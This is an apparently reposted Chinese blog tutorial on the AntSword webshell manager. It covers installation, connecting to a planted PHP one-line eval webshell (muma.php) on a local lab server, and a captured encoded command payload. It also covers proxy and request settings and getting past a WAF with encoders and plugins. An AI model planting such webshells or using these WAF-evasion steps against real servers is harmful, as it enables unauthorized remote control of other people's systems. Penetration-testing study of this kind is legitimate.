中国蚁剑安装使用教程

这篇具有很好参考价值的文章主要介绍了中国蚁剑安装使用教程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


大家好,我是the-back-zoom,如下是中国蚁剑安装使用教程,拒绝水文,从我做起

前言


中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

一、中国蚁剑安装

中国蚁剑安装教程_ccc123ccccc的博客-CSDN博客_rab3it

中国蚁剑的安装直接看这个人写的博客,安装不难,所以我直接讲中国蚁剑的使用

二、中国蚁剑使用

2.1中国蚁剑连接木马

我的服务器地址是192.168.93.129(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

<?php @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

中国蚁剑安装使用教程

  1. url填写http://192.168.93.129/muma.php

中国蚁剑安装使用教程

如上所示,点击测试连接,可以查看是否能够连接成功,点击添加就可以进行如下操作下:

中国蚁剑安装使用教程

2.2中国蚁剑设置代理

  1. 首先点击设置

中国蚁剑安装使用教程

  1. 进行相应的配置

中国蚁剑安装使用教程
中国蚁剑安装使用教程

  1. 配置正确点击测试连接就可以进行抓包

    点击正上方的测试连接

中国蚁剑安装使用教程

2.3中国蚁剑参数设置

如下所示,是http包的相应的参数

POST /muma.php HTTP/1.1
Host: 192.168.93.129:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 983
Connection: close

1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2230618%22%3Becho%20%40asenc(%24output)%3Becho%20%227a2d1%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

如上所示,如果需要添加请求行的参数,或者是POST传递的参数,该如何搞了:

中国蚁剑安装使用教程

在添加数据下有请求信息配置,如何配置如上所示:如下是其他配置:

中国蚁剑安装使用教程

2.4中国蚁剑其他使用

中国蚁剑安装使用教程

三、 中国蚁剑绕过Waf

3.1 编码绕过WAF

中国蚁剑安装使用教程

设置不同的编码器和解码器可以绕过waf,如下所示:

我的服务器地址是192.168.93.134(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

<?php @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

中国蚁剑安装使用教程

  1. url填写http://192.168.93.134/muma.php,然后点击测试连接,连接成功(没有开启安全狗)

中国蚁剑安装使用教程

开启安全狗连接失败,更改为base64编码器,又连接成功,如下所示:

  • 开启安全狗

中国蚁剑安装使用教程

基本上开启了waf,你就很难进行连接了,触发waf版本很老

3.2插件绕过waf

中国蚁剑安装使用教程

如上所示,点击插件市场,进行插件下载

中国蚁剑安装使用教程

由于shell不断在跟新,waf也在跟新,下载什么插件绕过只能够自己尝试

3.3 修改蚁剑绕过WAF

如下文章,是比较好的绕过waf的手段

蚁剑改造过WAF系列(一) - 0DayBug - 博客园 (cnblogs.com)

总结

如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF文章来源地址https://www.toymoban.com/news/detail-440638.html

到了这里,关于中国蚁剑安装使用教程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 攻防兼备:中国蚁剑使用指南及特征流量

    中国蚁剑是菜刀的升级版本,线现下主流的Webshell连接工具之一,有着较广泛的使用,本篇文章会教给大家蚁剑的使用方法以及不同加密方式的流量特征,兼顾攻防两端。 蚁剑下载安装参考:中国蚁剑(antSword)下载、安装、使用教程_蚁剑下载_攀爬的小白的博客-CSDN博客 目录

    2024年02月07日
    浏览(35)
  • Web安全-AntSword(中国蚁剑)Webshell管理工具使用

    蚂剑工具的下载分为两个部分,一个是项目核心源码antSword,另一个是加载器AntSword-Loader。我们依次进行下载,并且进行说明 先点击进入antSword,点击页面右侧\\\"releases\\\",进入工具的源码下载页面进行源码下载。 而后点击进入AntSword-Loader,点击页面右侧\\\"releases\\\",进入加载器下

    2024年02月12日
    浏览(42)
  • 中国蚁剑AntSword实战

    蚁剑加载器:AntSword-Loader 首次打开加载器时,界面如下图所示: 点击「初始化」按钮,选择蚁剑的源代码目录,或者选择一个空目录作为蚁剑的工作目录,加载器会自动下载源代码。待提示初始化完毕时,重新打开蚁剑加载器,即可看到蚁剑的主界面

    2023年04月10日
    浏览(37)
  • 中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客

    中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 WebShell可以理解为网页中的 木马程序 ,通过植入到你的web站点,在web页面上的操作, 控制你的计算机 操作系统,文件,权限,任意命令执行。

    2024年02月13日
    浏览(43)
  • 今天教大家微信小程序怎么免300元认证费终身使用的教程

    众所周知微信小程序认证需要300元认证费,当然用已认证的微信公众号可以免费认证但是认证微信公众号也需要300认证费而且需要每年进行年检等于每年都要花300元。 不知道大家注册小程序的时候有没有发现审核很慢申请完需要等几天很费时间, 而且微信限制一个身份证只

    2024年02月08日
    浏览(58)
  • 中国专利电子申请网CPC客户端的安装教程

    本人电脑系统配置 :Windows 10 家庭中文版64位(XP、win7、win8均可) Microsoft :Office2010 (32位),版本:14.0.4160.1000 【注:最高为2010版本,2003和2007也可以】 提供一个本人使用的Microsoft链接,有用到的可以下载安装:链接:https://pan.baidu.com/s/1Ei3Kluw9xSCqBvU4Nght7Q,提取码:jwyp(

    2024年02月11日
    浏览(41)
  • Mac电脑安装蚁剑

    1: github 下载源码和加载器:https://github.com/AntSwordProject AntSwordProject · GitHub AntSwordProject has 12 repositories available. Follow their code on GitHub. https://github.com/AntSwordProject 以该图为主页面:antSword为源码,AntSword-Loader为加载器,下载的时候我都选择下载到桌面了,用户可以自定义下载目

    2024年04月16日
    浏览(27)
  • TCS2010(中国标准编写模板)安装教程+解决三级标题条无法设置

    TCS2010可以轻松编制符合GB/T 1.1-2020要求的标准。 TCS2010发布已经很长一段时间,且软件要求只能安装在office2007或2003的版本中。 小编的电脑是win10(64位)系统,且软件是office2016,发现也可以成功使用TCS2010,现将经验分享给大家。 一、工具/原料 装有win10(64位)系统的电脑

    2024年02月06日
    浏览(40)
  • webshell管理工具-antSword(蚁剑)的安装和管理

    中国蚁剑是一款流行的网络安全工具,它由中国安全研究人员研发,主要用于测试和评估网络的安全性。 蚁剑具有强大的功能,可以用于远程控制和管理服务器,包括文件管理、进程管理、端口扫描、SQL注入、WebShell等功能。它还可以在未授权的情况下访问和操纵目标系统,

    2024年02月16日
    浏览(49)
  • 安装配置pytorch环境(参考B站“我是土堆”)

    1.   按照步骤安装Anaconda,其中注意要把环境变量添加到path中,安装Anaconda就相当于安装了python,安装成功以后在命令提示符中输入python会出现其版本说明安装成功,如下图所示安装的python版本是3.9.12。 安装​ Anaconda的另一个好处在于我们可以自己创建一个新的环境,当我们

    2024年02月10日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包